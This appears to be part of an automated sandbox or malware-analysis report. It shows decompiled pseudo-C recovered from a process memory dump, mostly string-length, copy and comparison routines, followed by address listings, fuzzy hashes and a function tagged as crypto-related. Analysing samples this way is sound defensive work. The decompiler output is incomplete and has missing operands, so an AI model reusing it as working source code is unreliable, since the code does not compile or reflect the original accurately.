																							if(( <=  ? _t395 + 0x20 : _t395) == _t292) {
																								goto L191;
																							}
																							__eflags =  *_t466;
																							if( *_t466 != 0) {
																								continue;
																							}
																							goto L90;
																						}
																						goto L191;
																					}
																					_t298 = _v28;
																					while(1) {
																						__eflags =  *((char*)(_t478 + _t298));
																						if( *((char*)(_t478 + _t298)) == 0) {
																							break;
																						}
																						_t478 = _t478 + 1;
																						__eflags = _t478 - 0x7fffffff;
																						if(_t478 < 0x7fffffff) {
																							continue;
																						}
																						goto L176;
																					}
																					L193:
																					__eflags = _t478;
																					if(__eflags == 0) {
																						goto L176;
																					}
																					if(__eflags > 0) {
																						goto L177;
																					}
																					_v44 = _t390;
																					_t254 = _v36;
																					_t466 = _v40;
																					goto L183;
																				}
																				asm("bsf esi, ebx");
																				_t478 = _t478 + _t443;
																				goto L193;
																			}
																			_t292 = _v28;
																			_t443 = _t268;
																			_t478 = 0;
																			__eflags = 0;
																			while(1) {
																				__eflags =  *((char*)(_t478 + _t292));
																				if( *((char*)(_t478 + _t292)) == 0) {
																					goto L193;
																				}
																				_t478 = _t478 + 1;
																				__eflags = _t478 - _t268;
																				if(_t478 < _t268) {
																					continue;
																				}
																				goto L169;
																			}
																			goto L193;
																			L191:
																			_t390 = _v44;
																			_t268 = _v32;
																			__eflags = _t319;
																		} while (_t319 != 0);
																		L192:
																		_t254 = _v36;
																		_t284 = _a4;
																		goto L91;
																	}
																	L184:
																	_t365 = _v44;
																	goto L91;
																}
																_t288 = _t288 + 1;
																__eflags = _t288 - _v68;
																if(_t288 < _v68) {
																	continue;
																}
																goto L82;
															}
															_t362 = _v44;
															_t465 = _t319 + 1;
															__eflags = _t465;
															if(_t465 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t290 =  <=  ? _v40 : _v48;
															_t284 =  <=  ? _v40 : _v48;
															__eflags =  *(_t319 + 1);
															if( *(_t319 + 1) == 0) {
																goto L52;
															}
															_v44 = _t362;
															while(1) {
																_t319 = _t319 + 1;
																_t465 = _t465 + 1;
																_t363 =  *_t319 & 0x000000ff;
																__eflags =  *((char*)(_t465 - 1)) + 0xffffffbf - 0x19;
																_t364 =  <=  ? _t363 + 0x20 : _t363;
																__eflags = ( <=  ? _t363 + 0x20 : _t363) - _t284;
																if(( <=  ? _t363 + 0x20 : _t363) == _t284) {
																	goto L207;
																}
																__eflags =  *_t465;
																if( *_t465 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L207;
														}
														_t299 = _v28;
														while(1) {
															__eflags =  *((char*)(_t461 + _t299));
															if( *((char*)(_t461 + _t299)) == 0) {
																break;
															}
															_t461 = _t461 + 1;
															__eflags = _t461 - 0x7fffffff;
															if(_t461 < 0x7fffffff) {
																continue;
															}
															goto L76;
														}
														L203:
														__eflags = _t461;
														if(__eflags == 0) {
															goto L76;
														}
														if(__eflags > 0) {
															goto L77;
														}
														_t466 = _v40;
														_t284 = _a4;
														goto L83;
													}
													asm("bsf esi, ebx");
													_t461 = _t461 + _t422;
													goto L203;
												}
												_t284 = _v28;
												_t422 = _t246;
												_t461 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t461 + _t284));
													if( *((char*)(_t461 + _t284)) == 0) {
														goto L203;
													}
													_t461 = _t461 + 1;
													__eflags = _t461 - _t246;
													if(_t461 < _t246) {
														continue;
													}
													goto L69;
												}
												goto L203;
												L207:
												_t357 = _v44;
												_t246 = _v32;
												__eflags = _t319;
											} while (_t319 != 0);
											goto L52;
										}
										goto L39;
									}
									_t279 =  *_t344;
									 *_t311 = _t279;
									__eflags = _t279;
									if(_t279 == 0) {
										goto L33;
									}
									_v60 = _t413;
									_t280 = 0;
									__eflags = 0;
									_v64 = _t283;
									_v68 = _t449;
									while(1) {
										_t280 = _t280 + 1;
										_t301 =  *((char*)(_t344 + _t280 * 2 - 1));
										 *(_t311 + _t280 * 2 - 1) = _t301;
										__eflags = _t301;
										if(_t301 == 0) {
											break;
										}
										_t302 =  *((char*)(_t344 + _t280 * 2));
										 *(_t311 + _t280 * 2) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											continue;
										}
										break;
									}
									_t413 = _v60;
									_t283 = _v64;
									_t449 = _v68;
									goto L33;
								}
							}
							_t311 = _v56;
							goto L36;
						}
						_t400 = _t406 & 0x0000000f;
						__eflags = _t400;
						if(_t400 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t308 =  ~( ~_t400 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t308;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t231;
								if(_t231 != 0) {
									break;
								}
								_t400 = _t400 + 0x10;
								__eflags = _t400 - _t308;
								if(_t400 < _t308) {
									continue;
								}
								__eflags = _t308 - 0x7fffffff;
								if(_t308 >= 0x7fffffff) {
									L21:
									_t310 = 0x40;
									_t283 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t308 + _t406));
									if( *((char*)(_t308 + _t406)) == 0) {
										break;
									}
									_t308 = _t308 + 1;
									__eflags = _t308 - 0x7fffffff;
									if(_t308 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L209:
								__eflags = _t283 - 0xfffffffe;
								if(_t283 != 0xfffffffe) {
									_t310 = 0x40;
								} else {
									 *_t406 = 0;
									_t310 = _v52;
								}
								goto L22;
							}
							asm("bsf ebx, eax");
							_t283 = _t308 + _t400;
							goto L209;
						}
						_t283 = 0;
						_t400 =  ~_t400 + 0x10;
						__eflags = _t400;
						while(1) {
							__eflags =  *((char*)(_t283 + _t406));
							if( *((char*)(_t283 + _t406)) == 0) {
								goto L209;
							}
							_t283 = _t283 + 1;
							__eflags = _t283 - _t400;
							if(_t283 < _t400) {
								continue;
							}
							goto L15;
						}
						goto L209;
					}
					_t237 =  &_v56;
					goto L37;
				}
				if(_t406 == 0) {
					L6:
					_push(1);
					_push(_t230);
					E008A10B0();
					_t485 = _t485 + 8;
					goto L8;
				}
				_t402 =  *_t230;
				 *_t406 = _t402;
				if(_t402 == 0) {
					goto L6;
				}
				_t340 = 0;
				while(1) {
					_t340 = _t340 + 1;
					_t403 =  *((char*)(_t230 + _t340 * 2 - 1));
					 *((char*)(_t406 + _t340 * 2 - 1)) = _t403;
					if(_t403 == 0) {
						goto L6;
					}
					_t404 =  *((char*)(_t230 + _t340 * 2));
					 *((char*)(_t406 + _t340 * 2)) = _t404;
					if(_t404 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x008b2e6e
0x008b2e72
0x008b2e74
0x008b2e78
0x008b2e7f
0x008b2e81
0x008b2e84
0x008b2e8a
0x008b2ec1
0x008b2ec4
0x008b2ec4
0x008b2ec8
0x008b2ed0
0x008b2ed6
0x008b2ee1
0x008b2ee3
0x008b37d3
0x008b37d8
0x008b2f5d
0x008b2f62
0x008b2f62
0x008b2f65
0x008b2f68
0x008b2f6b
0x008b2f6d
0x008b2f82
0x008b2f85
0x008b2f85
0x008b2f8b
0x008b2f93
0x008b2f93
0x008b2f93
0x008b2f96
0x008b2f9d
0x008b2fa0
0x008b2fa6
0x008b2fa8
0x008b2fab
0x008b2faf
0x008b2fb1
0x008b3006
0x00000000
0x008b2fb3
0x008b2fb3
0x008b2fb5
0x008b2ff1
0x008b2ff1
0x008b2ff3
0x008b2ff4
0x008b2ff8
0x008b2ffd
0x008b3001
0x008b3009
0x008b3009
0x008b300d
0x008b3011
0x008b3015
0x008b3018
0x008b301e
0x008b3023
0x008b3023
0x008b3025
0x008b3029
0x008b302e
0x008b303d
0x008b303d
0x008b3041
0x008b3043
0x008b304b
0x008b304d
0x008b3050
0x008b3054
0x008b308e
0x008b3135
0x008b3135
0x008b3137
0x008b313e
0x008b313e
0x008b3140
0x008b3144
0x008b3150
0x008b3154
0x008b3161
0x008b3161
0x008b3058
0x008b307e
0x008b307e
0x008b3080
0x008b3081
0x008b3086
0x00000000
0x008b3086
0x008b305a
0x008b305d
0x008b3061
0x00000000
0x00000000
0x008b3063
0x008b3065
0x008b3065
0x008b3066
0x008b306b
0x008b3071
0x00000000
0x00000000
0x008b3073
0x008b3077
0x008b307c
0x00000000
0x00000000
0x00000000
0x008b307c
0x00000000
0x008b3065
0x008b3032
0x008b3035
0x008b303b
0x008b3096
0x008b3098
0x008b309c
0x008b309e
0x008b30e4
0x008b30e4
0x008b30e8
0x008b30ea
0x008b30f2
0x008b30f4
0x008b30f7
0x008b30f9
0x008b30fb
0x008b3132
0x00000000
0x008b3132
0x008b30fd
0x008b30ff
0x008b3125
0x008b3125
0x008b3127
0x008b3128
0x008b312d
0x00000000
0x008b312d
0x008b3101
0x008b3104
0x008b3106
0x008b3108
0x00000000
0x00000000
0x008b310a
0x008b310a
0x008b310c
0x008b310c
0x008b310d
0x008b3112
0x008b3116
0x008b3118
0x00000000
0x00000000
0x008b311a
0x008b311e
0x008b3121
0x008b3123
0x00000000
0x00000000
0x00000000
0x008b3123
0x00000000
0x008b310c
0x008b30a0
0x008b30a3
0x00000000
0x00000000
0x008b30a5
0x008b30a7
0x008b30a9
0x008b30a9
0x008b30ac
0x008b30b0
0x008b30b3
0x008b30b6
0x008b30b9
0x008b30bc
0x008b30bc
0x008b30be
0x008b30be
0x008b30c4
0x008b30ca
0x008b30cd
0x008b30cf
0x00000000
0x00000000
0x008b30d5
0x008b30d6
0x008b30d7
0x008b30db
0x008b30df
0x00000000
0x00000000
0x008b30e1
0x008b30e1
0x00000000
0x008b30e1
0x008b3164
0x008b3167
0x008b3169
0x00000000
0x00000000
0x008b3173
0x008b3176
0x008b3182
0x008b3182
0x008b3185
0x008b318c
0x008b3190
0x008b3192
0x008b3192
0x008b3194
0x008b3196
0x008b31af
0x008b31bf
0x008b31bf
0x008b31c5
0x008b31c5
0x008b31ca
0x008b31ce
0x008b31d2
0x008b31d4
0x00000000
0x00000000
0x008b31da
0x008b31dd
0x008b31df
0x00000000
0x00000000
0x008b31e5
0x008b31eb
0x008b3204
0x008b3204
0x008b3209
0x008b3209
0x008b320c
0x008b320c
0x008b320e
0x008b3212
0x008b3216
0x008b321a
0x008b3221
0x008b322a
0x008b322d
0x008b3230
0x008b3236
0x008b3239
0x008b323c
0x008b323e
0x00000000
0x00000000
0x008b324a
0x008b324c
0x008b3254
0x008b3254
0x008b3258
0x008b325c
0x008b325f
0x008b325f
0x008b3261
0x00000000
0x00000000
0x008b3267
0x008b326b
0x008b326b
0x008b326d
0x008b326f
0x008b326f
0x008b3270
0x00000000
0x00000000
0x008b3276
0x008b327a
0x00000000
0x00000000
0x008b3280
0x008b3289
0x008b3289
0x008b328c
0x008b328f
0x008b3293
0x008b3297
0x008b3297
0x008b3298
0x008b3299
0x008b32a0
0x008b32a3
0x008b32a9
0x008b32ac
0x008b32ae
0x00000000
0x00000000
0x008b32b4
0x008b32b7
0x00000000
0x00000000
0x008b32b9
0x008b32b9
0x008b32bd
0x008b32c1
0x008b32c4
0x008b32c4
0x008b32c6
0x008b32df
0x008b32ef
0x008b32ef
0x008b32f5
0x008b32f5
0x008b32fa
0x008b32fe
0x008b3302
0x008b3304
0x00000000
0x00000000
0x008b330a
0x008b330d
0x008b330f
0x00000000
0x00000000
0x008b3311
0x008b3317
0x008b332c
0x008b332c
0x008b3331
0x008b3335
0x008b3335
0x008b3338
0x008b3350
0x008b3360
0x008b3360
0x008b3366
0x008b3366
0x008b336b
0x008b336f
0x008b3373
0x008b3375
0x00000000
0x00000000
0x008b337b
0x008b337e
0x008b3380
0x00000000
0x00000000
0x008b3382
0x008b3385
0x008b338b
0x008b33a0
0x008b33a0
0x008b33a5
0x008b33a5
0x008b33ab
0x008b33ad
0x008b33af
0x008b33b1
0x008b33b3
0x008b33b6
0x008b33b8
0x008b33bb
0x008b33be
0x008b33c0
0x008b33c0
0x008b33c2
0x008b33c6
0x008b3519
0x008b3519
0x008b3520
0x008b3522
0x008b3525
0x008b3527
0x008b3529
0x008b3563
0x00000000
0x008b3563
0x008b352b
0x008b352d
0x008b3553
0x008b3553
0x008b3555
0x008b3556
0x008b355b
0x00000000
0x008b355b
0x008b352f
0x008b3532
0x008b3534
0x008b3536
0x00000000
0x00000000
0x008b3538
0x008b3538
0x008b353a
0x008b353a
0x008b353b
0x008b3540
0x008b3544
0x008b3546
0x00000000
0x00000000
0x008b3548
0x008b354c
0x008b354f
0x008b3551
0x00000000
0x00000000
0x00000000
0x008b3551
0x00000000
0x008b353a
0x008b33cc
0x008b33d0
0x008b33d4
0x00000000
0x00000000
0x008b33da
0x008b33dc
0x008b3451
0x008b3456
0x008b3456
0x008b3459
0x008b345c
0x008b345f
0x008b3461
0x008b3477
0x008b347a
0x008b347a
0x008b3480
0x008b3488
0x008b3488
0x008b3488
0x008b348b
0x008b3495
0x008b3498
0x008b349b
0x008b34a1
0x008b34a3
0x008b34a6
0x008b34a8
0x008b34aa
0x008b34e4
0x00000000
0x008b34ac
0x008b34ac
0x008b34ae
0x008b34d7
0x008b34d7
0x008b34d9
0x008b34da
0x008b34df
0x008b34e7
0x008b34ea
0x008b34ed
0x008b34ef
0x008b34ef
0x008b34f1
0x00000000
0x00000000
0x008b34f7
0x008b34fb
0x008b3501
0x008b3501
0x008b3504
0x008b3505
0x008b3507
0x008b3509
0x00000000
0x00000000
0x008b350b
0x008b350d
0x008b356b
0x00000000
0x008b356b
0x008b350f
0x008b350f
0x008b3511
0x00000000
0x00000000
0x008b34ff
0x008b3500
0x008b3500
0x008b3500
0x008b3501
0x008b34b0
0x008b34b3
0x008b34b5
0x008b34b7
0x00000000
0x00000000
0x008b34b9
0x008b34b9
0x008b34bb
0x008b34bb
0x008b34bc
0x008b34c1
0x008b34c5
0x008b34c7
0x00000000
0x00000000
0x008b34c9
0x008b34cd
0x008b34d0
0x008b34d2
0x00000000
0x00000000
0x00000000
0x008b34d2
0x008b34d4
0x00000000
0x008b34d4
0x008b34aa
0x008b3463
0x00000000
0x008b3463
0x008b33de
0x008b33e0
0x008b33e4
0x008b33e4
0x008b33e7
0x008b33ff
0x008b340f
0x008b340f
0x008b3415
0x008b3415
0x008b341a
0x008b341e
0x008b3422
0x008b3424
0x00000000
0x00000000
0x008b342a
0x008b342d
0x008b342f
0x00000000
0x00000000
0x008b3431
0x008b3437
0x008b344c
0x008b344c
0x00000000
0x008b344c
0x008b3439
0x008b343d
0x008b343d
0x008b3441
0x00000000
0x00000000
0x008b3443
0x008b3444
0x008b344a
0x00000000
0x00000000
0x00000000
0x008b344a
0x00000000
0x008b343d
0x008b3574
0x008b3577
0x00000000
0x008b3577
0x008b33eb
0x008b33ed
0x008b33f1
0x008b33f1
0x008b33f4
0x008b33f4
0x008b33f8
0x00000000
0x00000000
0x008b33fa
0x008b33fb
0x008b33fd
0x00000000
0x00000000
0x00000000
0x008b33fd
0x00000000
0x008b33f4
0x008b338d
0x008b3391
0x008b3391
0x008b3395
0x00000000
0x00000000
0x008b3397
0x008b3398
0x008b339e
0x00000000
0x00000000
0x00000000
0x008b339e
0x00000000
0x008b3391
0x008b357e
0x008b3581
0x008b3584
0x00000000
0x008b3584
0x008b333c
0x008b333e
0x008b3342
0x008b3342
0x008b3345
0x008b3345
0x008b3349
0x00000000
0x00000000
0x008b334b
0x008b334c
0x008b334e
0x00000000
0x00000000
0x00000000
0x008b334e
0x00000000
0x008b3345
0x008b3319
0x008b331d
0x008b331d
0x008b3321
0x00000000
0x00000000
0x008b3323
0x008b3324
0x008b332a
0x00000000
0x00000000
0x00000000
0x008b332a
0x00000000
0x008b331d
0x008b358b
0x008b358e
0x00000000
0x008b358e
0x008b32c8
0x008b32cc
0x008b32cc
0x008b32ce
0x008b32d2
0x008b32d4
0x008b32d4
0x008b32d8
0x00000000
0x00000000
0x008b32da
0x008b32db
0x008b32dd
0x00000000
0x00000000
0x00000000
0x008b32dd
0x00000000
0x008b32d4
0x008b3595
0x008b3599
0x008b359d
0x008b359f
0x00000000
0x00000000
0x008b35a5
0x008b35a9
0x008b35ad
0x008b35b1
0x008b35b5
0x008b35b5
0x008b35b7
0x008b35b9
0x008b35d2
0x008b35e2
0x008b35e2
0x008b35e8
0x008b35e8
0x008b35ed
0x008b35f1
0x008b35f5
0x008b35f7
0x00000000
0x00000000
0x008b35fd
0x008b3600
0x008b3602
0x00000000
0x00000000
0x008b3608
0x008b360e
0x008b3627
0x008b3627
0x008b362c
0x008b362c
0x008b362f
0x008b362f
0x008b3631
0x008b3635
0x008b3639
0x008b363d
0x008b3644
0x008b364d
0x008b3650
0x008b3653
0x008b3659
0x008b365c
0x008b365f
0x008b3661
0x00000000
0x00000000
0x008b3665
0x008b3667
0x008b3673
0x008b3673
0x008b3677
0x008b367b
0x008b367b
0x008b367d
0x00000000
0x00000000
0x00000000
0x008b367d
0x008b3669
0x008b366a
0x008b366d
0x00000000
0x00000000
0x00000000
0x008b366d
0x008b368f
0x008b3699
0x008b3699
0x008b369a
0x00000000
0x00000000
0x008b369c
0x008b36a5
0x008b36aa
0x008b36ad
0x008b36b1
0x00000000
0x00000000
0x008b36b3
0x008b36b7
0x008b36b7
0x008b36b8
0x008b36b9
0x008b36c3
0x008b36c9
0x008b36cc
0x008b36ce
0x00000000
0x00000000
0x008b36d0
0x008b36d3
0x00000000
0x00000000
0x00000000
0x008b36d5
0x00000000
0x008b36b7
0x008b3610
0x008b3614
0x008b3614
0x008b3618
0x00000000
0x00000000
0x008b361e
0x008b361f
0x008b3625
0x00000000
0x00000000
0x00000000
0x008b3625
0x008b36fa
0x008b36fa
0x008b36fc
0x00000000
0x00000000
0x008b3702
0x00000000
0x00000000
0x008b3708
0x008b370c
0x008b3710
0x00000000
0x008b3710
0x008b3719
0x008b3720
0x00000000
0x008b3720
0x008b35bb
0x008b35bf
0x008b35c1
0x008b35c1
0x008b35c3
0x008b35c3
0x008b35c7
0x00000000
0x00000000
0x008b35cd
0x008b35ce
0x008b35d0
0x00000000
0x00000000
0x00000000
0x008b35d0
0x00000000
0x008b36de
0x008b36de
0x008b36e2
0x008b36e6
0x008b36e6
0x008b36ee
0x008b36ee
0x008b36f2
0x00000000
0x008b36f2
0x008b3683
0x008b3683
0x00000000
0x008b3687
0x008b324e
0x008b324f
0x008b3252
0x00000000
0x00000000
0x00000000
0x008b3252
0x008b3724
0x008b372e
0x008b372e
0x008b372f
0x00000000
0x00000000
0x008b3735
0x008b373e
0x008b3743
0x008b3746
0x008b374a
0x00000000
0x00000000
0x008b3750
0x008b3754
0x008b3754
0x008b3755
0x008b3756
0x008b3760
0x008b3766
0x008b3769
0x008b376b
0x00000000
0x00000000
0x008b376d
0x008b3770
0x00000000
0x00000000
0x00000000
0x008b3772
0x00000000
0x008b3754
0x008b31ed
0x008b31f1
0x008b31f1
0x008b31f5
0x00000000
0x00000000
0x008b31fb
0x008b31fc
0x008b3202
0x00000000
0x00000000
0x00000000
0x008b3202
0x008b3777
0x008b3777
0x008b3779
0x00000000
0x00000000
0x008b377f
0x00000000
0x00000000
0x008b3785
0x008b3789
0x00000000
0x008b3789
0x008b3791
0x008b3798
0x00000000
0x008b3798
0x008b3198
0x008b319c
0x008b319e
0x008b319e
0x008b31a0
0x008b31a0
0x008b31a4
0x00000000
0x00000000
0x008b31aa
0x008b31ab
0x008b31ad
0x00000000
0x00000000
0x00000000
0x008b31ad
0x00000000
0x008b379c
0x008b379c
0x008b37a0
0x008b37a4
0x008b37a4
0x00000000
0x008b37ac
0x00000000
0x008b303b
0x008b2fb7
0x008b2fba
0x008b2fbc
0x008b2fbe
0x00000000
0x00000000
0x008b2fc0
0x008b2fc4
0x008b2fc4
0x008b2fc6
0x008b2fca
0x008b2fcd
0x008b2fcd
0x008b2fce
0x008b2fd3
0x008b2fd7
0x008b2fd9
0x00000000
0x00000000
0x008b2fdb
0x008b2fdf
0x008b2fe2
0x008b2fe4
0x00000000
0x00000000
0x00000000
0x008b2fe4
0x008b2fe6
0x008b2fea
0x008b2fee
0x00000000
0x008b2fee
0x008b2fb1
0x008b2f6f
0x00000000
0x008b2f6f
0x008b2eeb
0x008b2eeb
0x008b2eee
0x008b2f06
0x008b2f0a
0x008b2f16
0x008b2f16
0x008b2f1c
0x008b2f1c
0x008b2f21
0x008b2f25
0x008b2f29
0x008b2f2b
0x00000000
0x00000000
0x008b2f31
0x008b2f34
0x008b2f36
0x00000000
0x00000000
0x008b2f38
0x008b2f3e
0x008b2f53
0x008b2f53
0x008b2f58
0x00000000
0x00000000
0x00000000
0x00000000
0x008b2f40
0x008b2f40
0x008b2f40
0x008b2f44
0x00000000
0x00000000
0x008b2f4a
0x008b2f4b
0x008b2f51
0x00000000
0x00000000
0x00000000
0x008b2f51
0x008b37b1
0x008b37b1
0x008b37b4
0x008b37c2
0x008b37b6
0x008b37b6
0x008b37b9
0x008b37b9
0x00000000
0x008b37b4
0x008b37cc
0x008b37cf
0x00000000
0x008b37cf
0x008b2ef2
0x008b2ef4
0x008b2ef4
0x008b2ef7
0x008b2ef7
0x008b2efb
0x00000000
0x00000000
0x008b2f01
0x008b2f02
0x008b2f04
0x00000000
0x00000000
0x00000000
0x008b2f04
0x00000000
0x008b2ef7
0x008b2ed8
0x00000000
0x008b2ed8
0x008b2e8e
0x008b2eb4
0x008b2eb4
0x008b2eb6
0x008b2eb7
0x008b2ebc
0x00000000
0x008b2ebc
0x008b2e90
0x008b2e93
0x008b2e97
0x00000000
0x00000000
0x008b2e99
0x008b2e9b
0x008b2e9b
0x008b2e9c
0x008b2ea1
0x008b2ea7
0x00000000
0x00000000
0x008b2ea9
0x008b2ead
0x008b2eb2
0x00000000
0x00000000
0x00000000
0x008b2eb2
0x00000000

Strings

@, xrefs: 008B2EC8

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction ID: e4204541c532c74c0cb77b05ca809ef6df6d1e79da72ff4df822ce746bb17009
Opcode Fuzzy Hash: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction Fuzzy Hash: D0525C719087928BD725CE2CC48036ABBE2FFD5314F19865DE8A5DB396DB30DE418782

Uniqueness

Uniqueness Score: -1.00%

Function 008B7660, Relevance: 2.0, Strings: 1, Instructions: 793
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E008B7660(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t203;
				signed int _t206;
				signed int* _t207;
				signed int* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t259;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int* _t269;
				signed int _t271;
				signed int _t272;
				signed int _t275;
				signed int _t280;
				signed int* _t281;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int* _t316;
				signed int _t324;
				signed int _t326;
				unsigned int _t331;
				signed int _t333;
				signed int* _t335;
				signed int _t337;
				signed int* _t339;
				char _t340;
				char _t341;
				signed int _t343;
				intOrPtr* _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t349;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				unsigned int _t372;
				signed int _t374;
				signed int* _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t386;
				void* _t387;
				signed int _t388;
				intOrPtr* _t390;
				unsigned int _t396;
				signed int _t398;
				void* _t399;
				signed int _t400;
				signed int _t401;
				intOrPtr _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t422;
				signed int _t428;
				signed int _t429;
				unsigned int _t434;
				signed int _t437;
				void* _t439;
				void* _t441;

				_t439 = (_t437 & 0xfffffff0) - 0x34;
				_t390 = __ecx;
				_t303 =  *__ecx;
				if(_t303 != 0) {
					_t343 =  *( *( *(__ecx + 4)));
					__eflags = _t343;
					if(_t343 == 0) {
						L35:
						_push(0x40);
						_t284 = E008A1030();
						_t439 = _t439 + 4;
						__eflags =  *_t390 - 1;
						 *_t284 = 0;
						if( *_t390 <= 1) {
							goto L203;
						} else {
							_t415 = 0x40;
							goto L37;
						}
					} else {
						__eflags =  *_t343;
						if( *_t343 == 0) {
							goto L35;
						} else {
							_t262 = _t343 & 0x0000000f;
							__eflags = _t262;
							if(_t262 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t294 =  ~( ~_t262 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								__eflags = _t294;
								_v64 = _t294;
								_t429 = _t294;
								while(1) {
									asm("movdqu xmm1, [edx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t294;
									if(_t294 != 0) {
										break;
									}
									_t262 = _t262 + 0x10;
									__eflags = _t262 - _t429;
									if(_t262 < _t429) {
										continue;
									} else {
										_v64 = _t429;
										__eflags = _v64 - 0x7fffffff;
										if(_v64 >= 0x7fffffff) {
											L23:
											_v64 = 0x7fffffff;
										} else {
											_t275 = _t429;
											while(1) {
												__eflags =  *((char*)(_t275 + _t343));
												if( *((char*)(_t275 + _t343)) == 0) {
													break;
												}
												_t275 = _t275 + 1;
												__eflags = _t275 - 0x7fffffff;
												if(_t275 < 0x7fffffff) {
													continue;
												} else {
													goto L23;
												}
												goto L24;
											}
											_v64 = _t275;
										}
									}
									goto L24;
								}
								asm("bsf ebx, ebx");
								_v64 = _t294 + _t262;
							} else {
								_v64 = 0;
								_t299 = _v64;
								_t262 =  ~_t262 + 0x10;
								__eflags = _t262;
								while(1) {
									__eflags =  *((char*)(_t299 + _t343));
									if( *((char*)(_t299 + _t343)) == 0) {
										break;
									}
									_t299 = _t299 + 1;
									__eflags = _t299 - _t262;
									if(_t299 < _t262) {
										continue;
									} else {
										goto L16;
									}
									goto L24;
								}
								_v64 = _t299;
							}
							L24:
							_t264 = _v64 + 1;
							__eflags = _t264 - 0x40;
							_t265 =  <=  ? 0x40 : _t264;
							__eflags = _t265;
							if(_t265 > 0) {
								_t434 = (_t265 >> 5 >> 0x1a) + _t265 >> 6;
								_t266 = _t265 & 0x8000003f;
								__eflags = _t266;
								if(_t266 < 0) {
									_t266 = (_t266 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t266;
								}
								__eflags = _t266;
								_t415 = _t434 + (0 | _t266 > 0x00000000) << 6;
								_push(_t415);
								_v68 = _t343;
								_t269 = E008A1030();
								_t385 = _v68;
								_t339 = _t269;
								_t439 = _t439 + 4;
								_v60 = 0;
								_v44 = _t339;
								_v36 = _t390;
								 *_t339 = 0;
								_v68 =  *_t390;
								_t298 = _v60;
								_t404 = _v64;
								while(1) {
									_t271 =  *_t385;
									_t298 = _t298 + 1;
									 *_t339 = _t271;
									__eflags = _t404;
									if(_t404 == 0) {
										goto L33;
									}
									__eflags = _t298 - _t404;
									if(_t298 == _t404) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
										_t339[0] = 0;
									} else {
										goto L33;
									}
									L206:
									__eflags = _t272 - 1;
									if(_t272 > 1) {
										goto L37;
									} else {
										goto L157;
									}
									goto L200;
									L33:
									__eflags = _t271;
									if(_t271 == 0) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
									} else {
										_t339 =  &(_t339[0]);
										_t385 = _t385 + 1;
										__eflags = _t385;
										continue;
									}
									goto L206;
								}
							} else {
								_t284 = 0;
								__eflags = _t303 - 1;
								if(_t303 <= 1) {
									L203:
									_t344 = _a4;
									_t203 = 0;
									 *_t344 = 0;
									 *((intOrPtr*)(_t344 + 4)) = 0;
									__eflags = _t284;
									if(_t284 == 0) {
										goto L191;
									} else {
										goto L158;
									}
								} else {
									_t415 = 0;
									L37:
									_t308 = _a8 & 0x0000000f;
									asm("pxor xmm0, xmm0");
									_t359 =  ~_t308 + 0x10;
									__eflags = _t359;
									_v52 = _t359;
									_v56 = _t308;
									_v48 = _t415;
									_v36 = _t390;
									_t400 = 1;
									goto L38;
									do {
										do {
											do {
												L38:
												__eflags = _a8;
												if(_a8 != 0) {
													_t363 = _a8;
													__eflags =  *_t363;
													if( *_t363 != 0) {
														__eflags = _t284 - _a8;
														if(_t284 != _a8) {
															_t229 = _v56;
															__eflags = _t229;
															if(_t229 == 0) {
																L46:
																asm("pxor xmm1, xmm1");
																_t422 =  ~( ~_t229 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t422;
																while(1) {
																	asm("movdqu xmm0, [ecx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
